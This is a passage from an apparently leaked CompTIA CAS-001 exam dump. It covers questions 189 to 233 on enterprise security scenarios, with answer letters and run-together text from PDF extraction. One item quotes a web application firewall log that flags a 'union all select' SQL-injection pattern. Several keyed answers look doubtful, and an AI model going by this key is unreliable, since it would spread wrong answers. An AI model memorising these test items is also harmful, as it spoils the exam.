Real 105CompTIA CAS-001 Examavailability and integrity. Which of the following designs is BEST suited for this purpose?

A. All of the company servers are virtualized in a highly available environment sharing common hardware and redundant virtual storage. Clients use terminalservice access to the shared environment to access the virtualized applications. A secret key kept by the startup encrypts the application virtual memory anddata store.

Page 101: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. All of the company servers are virtualized in a highly available environment sharing common hardware and redundant virtual storage. Clients use terminalservice access to the shared environment and to access the virtualized applications. Each client has a common shared key, which encrypts the applicationvirtual memory and data store.

C. Each client is assigned a set of virtual hosts running shared hardware. Physical storage is partitioned into LUNS and assigned to each client. MPLS technologyis used to segment and encrypt each of the client's networks. PKI based remote desktop with hardware tokens is used by the client to connect to the application.

D. Each client is assigned a set of virtual hosts running shared hardware. Virtual storage is partitioned and assigned to each client. VLAN technology is used tosegment each of the client's networks. PKI based remote desktop access is used by the client to connect to the application.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 190A financial institution wants to reduce the costs associated with managing and troubleshooting employees' desktops and applications, while keeping employeesfrom copying data onto external storage. The Chief Information Officer (CIO) has asked the security team to evaluate four solutions submitted by the changemanagement group. Which of the following BEST accomplishes this task?

A. Implement desktop virtualization and encrypt all sensitive data at rest and in transit.B. Implement server virtualization and move the application from the desktop to the server.C. Implement VDI and disable hardware and storage mapping from the thin client.D. Move the critical applications to a private cloud and disable VPN and tunneling.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 191A health service provider is considering the impact of allowing doctors and nurses access to the internal email system from their personal smartphones. TheInformation Security Officer (ISO) has

Real 106CompTIA CAS-001 Examreceived a technical document from the security administrator explaining that the current email system is capable of enforcing security policies to personalsmartphones, including screen lockout and mandatory PINs. Additionally, the system is able to remotely wipe a phone if reported lost or stolen. Which of the

Page 102: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

following should the Information Security Officer be MOST concerned with based on this scenario? (Select THREE).

A. The email system may become unavailable due to overload.B. Compliance may not be supported by all smartphones.C. Equipment loss, theft, and data leakage.D. Smartphone radios can interfere with health equipment.E. Data usage cost could significantly increase.F. Not all smartphones natively support encryption.G. Smartphones may be used as rogue access points.

Correct Answer: BCFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 192The security administrator at a company has received a subpoena for the release of all the email received and sent by the company Chief Information Officer (CIO)for the past three years. The security administrator is only able to find one year's worth of email records on the server and is now concerned about the possible legalimplications of not complying with the request. Which of the following should the security administrator check BEFORE responding to the request?

A. The company data privacy policiesB. The company backup logs and archivesC. The company data retention policies and guidelinesD. The company data retention procedures

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 193A database administrator comes across the below records in one of the databases during an internal audit of the payment system:

UserIDAddressCredit Card No.Password

Page 103: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

jsmith123 fake street55XX-XXX-XXXX-1397Password100

Real 107CompTIA CAS-001 Examjqdoe234 fake street42XX-XXX-XXXX-202717DEC12

From a security perspective, which of the following should be the administrator's GREATEST concern, and what will correct the concern?

A. Concern: Passwords are stored in plain text.Correction: Require a minimum of 8 alphanumeric characters and hash the password.

B. Concern: User IDs are also usernames, and could be enumerated, thereby disclosing sensitive account information.Correction: Require user IDs to be more complex by using alphanumeric characters and hash the UserIDs.

C. Concern: User IDs are confidential private information.Correction: Require encryption of user IDs.

D. Concern: More than four digits within a credit card number are stored.Correction: Only store the last four digits of a credit card to protect sensitive financial information.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 194A security administrator is redesigning, and implementing a service-oriented architecture to replace an old, in-house software processing system, tied to a corporatesales website. After performing the business process analysis, the administrator decides the services need to operate in a dynamic fashion. The company has alsobeen the victim of data injection attacks in the past and needs to build in mitigation features. Based on these requirements and past vulnerabilities, which of thefollowing needs to be incorporated into the SOA?

A. Point to point VPNs for all corporate intranet users.B. Cryptographic hashes of all data transferred between services.C. Service to service authentication for all workflows.D. Two-factor authentication and signed code

Correct Answer: CSection: (none)Explanation

Explanation/Reference:

Page 104: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 195A team of security engineers has applied regulatory and corporate guidance to the design of a corporate network. The engineers have generated an SRTM basedon their work and a thorough

Real 108CompTIA CAS-001 Examanalysis of the complete set of functional and performance requirements in the network specification. Which of the following BEST describes the purpose of anSRTM in this scenario?

A. To ensure the security of the network is documented prior to customer deliveryB. To document the source of all functional requirements applicable to the networkC. To facilitate the creation of performance testing metrics and test plansD. To allow certifiers to verify the network meets applicable security requirements

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 196A small company hosting multiple virtualized client servers on a single host is considering adding a new host to create a cluster. The new host hardware andoperating system will be different from the first host, but the underlying virtualization technology will be compatible. Both hosts will be connected to a shared iSCSIstorage solution. Which of the following is the hosting company MOST likely trying to achieve?

A. Increased customer data availabilityB. Increased customer data confidentialityC. Increased security through provisioningD. Increased security through data integrity

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Page 105: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 197A security administrator is conducting network forensic analysis of a recent defacement of the company's secure web payment server (HTTPS). The server wascompromised around the New Year's holiday when all the company employees were off. The company's network diagram is summarized below:

- Internet- Gateway Firewall- IDS- Web SSL Accelerator- Web Server Farm- Internal Firewall- Company Internal Network

Real 109CompTIA CAS-001 ExamThe security administrator discovers that all the local web server logs have been deleted. Additionally, the Internal Firewall logs are intact but show no activity fromthe internal network to the web server farm during the holiday.

Which of the following is true?

A. The security administrator should review the IDS logs to determine the source of the attack and the attack vector used to compromise the web server.B. The security administrator must correlate the external firewall logs with the intrusion detection system logs to determine what specific attack led to the web

server compromise.C. The security administrator must reconfigure the network and place the IDS between the SSL accelerator and the server farm to be able to determine the cause

of future attacks.D. The security administrator must correlate logs from all the devices in the network diagram to determine what specific attack led to the web server compromise.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 198The security manager of a company has hired an external consultant to conduct a security assessment of the company network. The contract stipulates that theconsultant is not allowed to transmit any data on the company network while performing wired and wireless security assessments. Which of the following technicalmeans can the consultant use to determine the manufacturer and likely operating system of the company wireless and wired network devices, as well as thecomputers connected to the company network?

A. Social engineering

Page 106: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. Protocol analyzerC. Port scannerD. Grey box testing

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 199A security consultant is called into a small advertising business to recommend which security policies and procedures would be most helpful to the business. Thebusiness is comprised of 20 employees, operating off of two shared servers. One server houses employee data and the other

Real 110CompTIA CAS-001 Examhouses client data. All machines are on the same local network. Often these employees must work remotely from client sites, but do not access either of theservers remotely. Assuming no security policies or procedures are in place right now, which of the following would be the MOST applicable for implementation?(Select TWO).

A. Password PolicyB. Data Classification PolicyC. Wireless Access ProcedureD. VPN PolicyE. Database Administrative Procedure

Correct Answer: ABSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 200When attending the latest security conference, an information security administrator noticed only a few people carrying a laptop around. Most other attendees onlycarried their smartphones.

Which of the following would impact the security of conference's resources?

Page 107: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Wireless network security may need to be increased to decrease access of mobile devices.B. Physical security may need to be increased to deter or prevent theft of mobile devices.C. Network security may need to be increased by reducing the number of available physical network jacks.D. Wireless network security may need to be decreased to allow for increased access of mobile devices.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 201A process allows a LUN to be available to some hosts and unavailable to others. Which of the following causes such a process to become vulnerable?

A. LUN maskingB. Data injectionC. Data fragmentationD. Moving the HBA

Real 111CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 202In order for a company to boost profits by implementing cost savings on non-core business activities, the IT manager has sought approval for the corporate emailsystem to be hosted in the cloud. The compliance officer has been tasked with ensuring that data lifecycle issues are taken into account. Which of the followingBEST covers the data lifecycle end-to-end?

Page 108: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

http://www.gratisexam.com/

A. Creation and secure destruction of mail accounts, emails, and calendar itemsB. Information classification, vendor selection, and the RFP processC. Data provisioning, processing, in transit, at rest, and de-provisioningD. Securing virtual environments, appliances, and equipment that handle email

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 203A large organization has gone through several mergers, acquisitions, and de-mergers over the past decade. As a result, the internal networks have been integratedbut have complex dependencies and interactions between systems. Better integration is needed in order to simplify the underlying complexity. Which of thefollowing is the MOST suitable integration platform to provide event-driven and standards-based secure software architecture?

A. Service oriented architecture (SOA)B. Federated identitiesC. Object request broker (ORB)D. Enterprise service bus (ESB)

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 204

Page 109: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

The Chief Information Officer (CIO) of a technology company is likely to move away from a de- perimeterized model for employee owned devices. This is becausethere were too many issues

Real 112CompTIA CAS-001 Examwith lack of patching, malware incidents, and data leakage due to lost/stolen devices which did not have full-disk encryption. The `bring your own computing'approach was originally introduced because different business units preferred different operating systems and application stacks. Based on the issues and userneeds, which of the following is the BEST recommendation for the CIO to make?

A. The de-perimeterized model should be kept as this is major industry trend and other companies are following this direction. Advise that the issues being facedare standard business as usual concerns in a modern IT environment.

B. Update the policy to disallow non-company end-point devices on the corporate network.Develop security-focused standard operating environments (SOEs) for all required operating systems and ensure the needs of each business unit are met.

C. The de-perimeterized model should be kept but update company policies to state that non- company end-points require full disk encryption, anti-virus software,and regular patching.

D. Update the policy to disallow non-company end-point devices on the corporate network. Allow only one type of outsourced SOE to all users as this will be easierto provision, secure, and will save money on operating costs.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 205An architect has been engaged to write the security viewpoint of a new initiative. Which of the following BEST describes a repeatable process that can be used forestablishing the security architecture?

A. Inspect a previous architectural document. Based on the historical decisions made, consult the architectural control and pattern library within the organizationand select the controls that appear to best fit this new architectural need.

B. Implement controls based on the system needs. Perform a risk analysis of the system. For any remaining risks, perform continuous monitoring.C. Classify information types used within the system into levels of confidentiality, integrity, and availability. Determine minimum required security controls. Conduct

a risk analysis. Decide on which security controls to implement.D. Perform a risk analysis of the system. Avoid extreme risks. Mitigate high risks. Transfer medium risks and accept low risks. Perform continuous monitoring to

ensure that the system remains at an adequate security posture.

Correct Answer: CSection: (none)Explanation

Page 110: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

Real 113CompTIA CAS-001 Exam

QUESTION 206Within the company, there is executive management pressure to start advertising to a new target market. Due to the perceived schedule and budget inefficienciesof engaging a technology business unit to commission a new micro-site, the marketing department is engaging third parties to develop the site in order to meettime-to-market demands. From a security perspective, which of the following options BEST balances the needs between marketing and risk management?

A. The third party should be contractually obliged to perform adequate security activities, and evidence of those activities should be confirmed by the company priorto launch.

B. Outsourcing is a valid option to increase time-to-market. If a security incident occurs, it is not of great concern as the reputational damage will be the third party'sresponsibility.

C. The company should never outsource any part of the business that could cause a security or privacy incident. It could lead to legal and compliance issues.D. If the third party has an acceptable record to date on security compliance and is provably faster and cheaper, then it makes sense to outsource in this specific

situation.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 207Several business units have requested the ability to use collaborative web-based meeting places with third party vendors. Generally these require user registration,installation of client-based ActiveX or Java applets, and also the ability for the user to share their desktop in read-only or read-write mode. In order to ensure thatinformation security is not compromised, which of the following controls is BEST suited to this situation?

A. Disallow the use of web-based meetings as this could lead to vulnerable client-side components being installed, or a malicious third party gaining read-writecontrol over an internal workstation.

B. Hire an outside consultant firm to perform both a quantitative and a qualitative risk-based assessment. Based on the outcomes, if any risks are identified then donot allow web-based meetings. If no risks are identified then go forward and allow for these meetings to occur.

C. Allow the use of web-based meetings, but put controls in place to ensure that the use of these meetings is logged and tracked.D. Evaluate several meeting providers. Ensure that client-side components do not introduce undue security risks. Ensure that the read-write desktop mode can

either be prevented or strongly audited.

Page 111: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 114CompTIA CAS-001 Exam

QUESTION 208A new web application system was purchased from a vendor and configured by the internal development team. Before the web application system was moved intoproduction, a vulnerability assessment was conducted. A review of the vulnerability assessment report indicated that the testing team discovered a minor securityissue with the configuration of the web application. The security issue should be reported to:

A. CISO immediately in an exception report.B. Users of the new web application system.C. The vendor who supplied the web application system.D. Team lead in a weekly report.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 209A security consultant is hired by a company to determine if an internally developed web application is vulnerable to attacks. The consultant spent two weeks testingthe application, and determines that no vulnerabilities are present. Based on the results of the tools and tests available, which of the following statements BESTreflects the security status of the application?

A. The company's software lifecycle management improved the security of the application.B. There are no vulnerabilities in the application.C. The company should deploy a web application firewall to ensure extra security.D. There are no known vulnerabilities at this time.

Correct Answer: DSection: (none)Explanation

Page 112: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 210In an effort to reduce internal email administration costs, a company is determining whether to outsource its email to a managed service provider that providesemail, spam, and malware protection. The security manager is asked to provide input regarding any security implications of this change.

Real 115CompTIA CAS-001 ExamWhich of the following BEST addresses risks associated with disclosure of intellectual property?

A. Require the managed service provider to implement additional data separation.B. Require encrypted communications when accessing email.C. Enable data loss protection to minimize emailing PII and confidential data.D. Establish an acceptable use policy and incident response policy.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 211A company is preparing to upgrade its NIPS at five locations around the world. The three platforms the team plans to test, claims to have the most advancedfeatures and lucrative pricing.

Assuming all platforms meet the functionality requirements, which of the following methods should be used to select the BEST platform?

A. Establish return on investment as the main criteria for selection.B. Run a cost/benefit analysis based on the data received from the RFP.C. Evaluate each platform based on the total cost of ownership.D. Develop a service level agreement to ensure the selected NIPS meets all performance requirements.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:

Page 113: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 212An organization has had component integration related vulnerabilities exploited in consecutive releases of the software it hosts. The only reason the company wasable to identify the compromises was because of a correlation of slow server performance and an attentive security analyst noticing unusual outbound networkactivity from the application servers. End-to-end management of the development process is the responsibility of the applications development manager and testingis done by various teams of programmers. Which of the following will MOST likely reduce the likelihood of similar incidents?

A. Conduct monthly audits to verify that application modifications do not introduce new vulnerabilities.B. Implement a peer code review requirement prior to releasing code into production.

Real 116CompTIA CAS-001 Exam

C. Follow secure coding practices to minimize the likelihood of creating vulnerable applications.D. Establish cross-functional planning and testing requirements for software development activities.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 213A company has a single subnet in a small office. The administrator wants to limit non-web related traffic to the corporate intranet server as well as prevent abnormalHTTP requests and HTTP protocol anomalies from causing problems with the web server. Which of the following is the MOST likely solution?

A. Application firewall and NIPSB. Edge firewall and HIDSC. ACLs and anti-virusD. Host firewall and WAF

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 214An administrator is reviewing logs and sees the following entry:

Page 114: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Message: Access denied with code 403 (phase 2). Pattern match "\bunion\b.{1,100}?\bselect\b" at ARGS:$id. [data "union all select"] [severity "CRITICAL"] [tag"WEB_ATTACK"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"]

Action: Intercepted (phase 2) Apache-Handler: php5-script

Which of the following attacks was being attempted?

A. Session hijackingB. Cross-site scriptC. SQL injectionD. Buffer overflow

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Real 117CompTIA CAS-001 Exam

Explanation:

QUESTION 215A team is established to create a secure connection between software packages in order to list employee's remaining or unused benefits on their paycheck stubs.Which of the following business roles would be MOST effective on this team?

A. Network Administrator, Database Administrator, ProgrammersB. Network Administrator, Emergency Response Team, Human ResourcesC. Finance Officer, Human Resources, Security AdministratorD. Database Administrator, Facilities Manager, Physical Security Manager

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 216

Page 115: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

An administrator is notified that contract workers will be onsite assisting with a new project. The administrator wants each worker to be aware of the corporate policypertaining to USB storage devices. Which of the following should each worker review and understand before beginning work?

A. Interconnection Security AgreementB. Memorandum of UnderstandingC. Business Partnership AgreementD. Non-Disclosure Agreement

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 217A new startup company with very limited funds wants to protect the organization from external threats by implementing some type of best practice security controlsacross a number of hosts located in the application zone, the production zone, and the core network. The 50 hosts in the core network are a mixture of Windowsand Linux based systems, used by development staff to develop new applications. The single Windows host in the application zone is used exclusively by

Real 118CompTIA CAS-001 Examthe production team to control software deployments into the production zone. There are 10 UNIX web application hosts in the production zone which are publicallyaccessible.

Development staff is required to install and remove various types of software from their hosts on a regular basis while the hosts in the zone rarely require any typeof configuration changes.

Which of the following when implemented would provide the BEST level of protection with the LEAST amount of disruption to staff?

A. NIPS in the production zone, HIPS in the application zone, and anti-virus / anti-malware across all Windows hosts.B. NIPS in the production zone, NIDS in the application zone, HIPS in the core network, and anti- virus / anti-malware across all hosts.C. HIPS in the production zone, NIPS in the application zone, and HIPS in the core network.D. NIDS in the production zone, HIDS in the application zone, and anti-virus / anti-malware across all hosts.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:

Page 116: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 218A security manager is developing new policies and procedures. Which of the following is a best practice in end user security?

A. Employee identity badges and physical access controls to ensure only staff are allowed onsite.B. A training program that is consistent, ongoing, and relevant.C. Access controls to prevent end users from gaining access to confidential data.D. Access controls for computer systems and networks with two-factor authentication.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 219If a technician must take an employee's workstation into custody in response to an investigation, which of the following can BEST reduce the likelihood of relatedlegal issues?

A. A formal letter from the company's president approving the seizure of the workstation.B. A formal training and awareness program on information security for all company managers.

Real 119CompTIA CAS-001 Exam

C. A screen displayed at log in that informs users of the employer's rights to seize, search, and monitor company devices.D. A printout of an activity log, showing that the employee has been spending substantial time on non-work related websites.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 220An organization has had six security incidents over the past year against their main web application. Each time the organization was able to determine the cause ofthe incident and restore operations within a few hours to a few days. Which of the following provides the MOST comprehensive method for reducing the time torecover?

Page 117: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Create security metrics that provide information on response times and requirements to determine the best place to focus time and money.B. Conduct a loss analysis to determine which systems to focus time and money towards increasing security.C. Implement a knowledge management process accessible to the help desk and finance departments to estimate cost and prioritize remediation.D. Develop an incident response team, require training for incident remediation, and provide incident reporting and tracking metrics.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 221A company runs large computing jobs only during the overnight hours. To minimize the amount of capital investment in equipment, the company relies on the elasticcomputing services of a major cloud computing vendor. Because the virtual resources are created and destroyed on the fly across a large pool of shared resources,the company never knows which specific hardware platforms will be used from night to night. Which of the following presents the MOST risk to confidentiality in thisscenario?

A. Loss of physical control of the serversB. Distribution of the job to multiple data centersC. Network transmission of cryptographic keysD. Data scraped from the hardware platforms

Real 120CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 222A business wants to start using social media to promote the corporation and to ensure that customers have a good experience with their products. Which of thefollowing security items should the company have in place before implementation? (Select TWO).

A. The company must dedicate specific staff to act as social media representatives of the company.B. All staff needs to be instructed in the proper use of social media in the work environment.C. Senior staff blogs should be ghost written by marketing professionals.

Page 118: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. The finance department must provide a cost benefit analysis for social media.E. The security policy needs to be reviewed to ensure that social media policy is properly implemented.F. The company should ensure that the company has sufficient bandwidth to allow for social media traffic.

Correct Answer: AESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 223An administrator at a small company replaces servers whenever budget money becomes available. Over the past several years the company has acquired and stilluses 20 servers and 50 desktops from five different computer manufacturers. Which of the following are management challenges and risks associated with thisstyle of technology lifecycle management?

A. Decreased security posture, decommission of outdated hardware, inability to centrally manage, and performance bottlenecks on old hardware.B. Increased mean time to failure rate of legacy servers, OS variances, patch availability, and ability to restore to dissimilar hardware.C. OS end-of-support issues, ability to backup data, hardware parts availability, and firmware update availability and management.D. Inability to use virtualization, trusted OS complexities, and multiple patch versions based on OS dependency.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 121CompTIA CAS-001 Exam

QUESTION 224A Physical Security Manager is ready to replace all 50 analog surveillance cameras with IP cameras with built-in web management. The Security Manager hasseveral security guard desks on different networks that must be able to view the cameras without unauthorized people viewing the video as well. The selected IPcamera vendor does not have the ability to authenticate users at the camera level. Which of the following should the Security Manager suggest to BEST secure thisenvironment?

A. Create an IP camera network and deploy NIPS to prevent unauthorized access.B. Create an IP camera network and only allow SSL access to the cameras.

Page 119: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Create an IP camera network and deploy a proxy to authenticate users prior to accessing the cameras.D. Create an IP camera network and restrict access to cameras from a single management host.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 225In single sign-on, the secondary domain needs to trust the primary domain to do which of the following? (Select TWO).

A. Correctly assert the identity and authorization credentials of the end user.B. Correctly assert the authentication and authorization credentials of the end user.C. Protect the authentication credentials used to verify the end user identity to the secondary domain for unauthorized use.D. Protect the authentication credentials used to verify the end user identity to the secondary domain for authorized use.E. Protect the accounting credentials used to verify the end user identity to the secondary domain for unauthorized use.F. Correctly assert the identity and authentication credentials of the end user.

Correct Answer: DFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 226Real 122CompTIA CAS-001 ExamA corporation has Research and Development (R&D) and IT support teams, each requiring separate networks with independent control of their security boundariesto support department objectives. The corporation's Information Security Officer (ISO) is responsible for providing firewall services to both departments, but doesnot want to increase the hardware footprint within the datacenter. Which of the following should the ISO consider to provide the independent functionality requiredby each department's IT teams?

A. Put both departments behind the firewall and assign administrative control for each department to the corporate firewall.B. Provide each department with a virtual firewall and assign administrative control to the physical firewall.C. Put both departments behind the firewall and incorporate restrictive controls on each department's network.D. Provide each department with a virtual firewall and assign appropriate levels of management for the virtual device.

Page 120: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 227A manager who was attending an all-day training session was overdue entering bonus and payroll information for subordinates. The manager felt the best way toget the changes entered while in training was to log into the payroll system, and then activate desktop sharing with a trusted subordinate. The manager granted thesubordinate control of the desktop thereby giving the subordinate full access to the payroll system. The subordinate did not have authorization to be in the payrollsystem. Another employee reported the incident to the security team. Which of the following would be the MOST appropriate method for dealing with this issuegoing forward?

A. Provide targeted security awareness training and impose termination for repeat violators.B. Block desktop sharing and web conferencing applications and enable use only with approval.C. Actively monitor the data traffic for each employee using desktop sharing or web conferencing applications.D. Permanently block desktop sharing and web conferencing applications and do not allow its use at the company.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 228After connecting to a secure payment server at https://pay.xyz.com, an auditor notices that the

Real 123CompTIA CAS-001 ExamSSL certificate was issued to *.xyz.com. The auditor also notices that many of the internal development servers use the same certificate. After installing thecertificate on dev1.xyz.com, one of the developers reports misplacing the USB thumb-drive where the SSL certificate was stored. Which of the following should theauditor recommend FIRST?

A. Generate a new public key on both servers.B. Replace the SSL certificate on dev1.xyz.com.C. Generate a new private key password for both servers.D. Replace the SSL certificate on pay.xyz.com.

Page 121: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 229A morphed worm carrying a 0-day payload has infiltrated the company network and is now spreading across the organization. The security administrator was able toisolate the worm communication and payload distribution channel to TCP port 445. Which of the following can the administrator do in the short term to minimize theattack?

A. Deploy the following ACL to the HIPS: DENY - TCP - ANY - ANY 445.B. Run a TCP 445 port scan across the organization and patch hosts with open ports.C. Add the following ACL to the corporate firewall: DENY - TCP - ANY - ANY - 445.D. Force a signature update and full system scan from the enterprise anti-virus solution.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 230A security administrator wants to verify and improve the security of a business process which is tied to proven company workflow. The security administrator wasable to improve security by applying controls that were defined by the newly released company security standard. Such controls included code improvement,transport encryption, and interface restrictions. Which of the following can the security administrator do to further increase security after having exhausted all thetechnical controls dictated by the company's security standard?

A. Modify the company standard to account for higher security and meet with upper management for approval to implement the new standard.B. Conduct a gap analysis and recommend appropriate non-technical mitigating controls, and Real 124

CompTIA CAS-001 Examincorporate the new controls into the standard.

C. Conduct a risk analysis on all current controls, and recommend appropriate mechanisms to increase overall security.D. Modify the company policy to account for higher security, adapt the standard accordingly, and implement new technical controls.

Correct Answer: BSection: (none)

Page 122: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:Explanation:

QUESTION 231A company receives an e-discovery request for the Chief Information Officer's (CIO's) email data. The storage administrator reports that the data retention policyrelevant to their industry only requires one year of email data. However the storage administrator also reports that there are three years of email data on the serverand five years of email data on backup tapes. How many years of data MUST the company legally provide?

A. 1B. 2C. 3D. 5

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 232The VoIP administrator starts receiving reports that users are having problems placing phone calls. The VoIP administrator cannot determine the issue, and asksthe security administrator for help. The security administrator reviews the switch interfaces and does not see an excessive amount of network traffic on the voicenetwork. Using a protocol analyzer, the security administrator does see an excessive number of SIP INVITE packets destined for the SIP proxy. Based on theinformation given, which of the following types of attacks is underway and how can it be remediated?

A. Man in the middle attack; install an IPS in front of SIP proxy.B. Man in the middle attack; use 802.1x to secure voice VLAN.C. Denial of Service; switch to more secure H.323 protocol.D. Denial of Service; use rate limiting to limit traffic.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Real 125CompTIA CAS-001 Exam

Page 123: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 233The Chief Information Security Officer (CISO) of a small bank wants to embed a monthly testing regiment into the security management plan specifically for thedevelopment area. The CISO's requirements are that testing must have a low risk of impacting system stability, can be scripted, and is very thorough. Thedevelopment team claims that this will lead to a higher degree of test script maintenance and that it would be preferable if the testing was outsourced to a thirdparty. The CISO still maintains that third-party testing would not be as thorough as the third party lacks the introspection of the development team. Which of thefollowing will satisfy the CISO requirements?

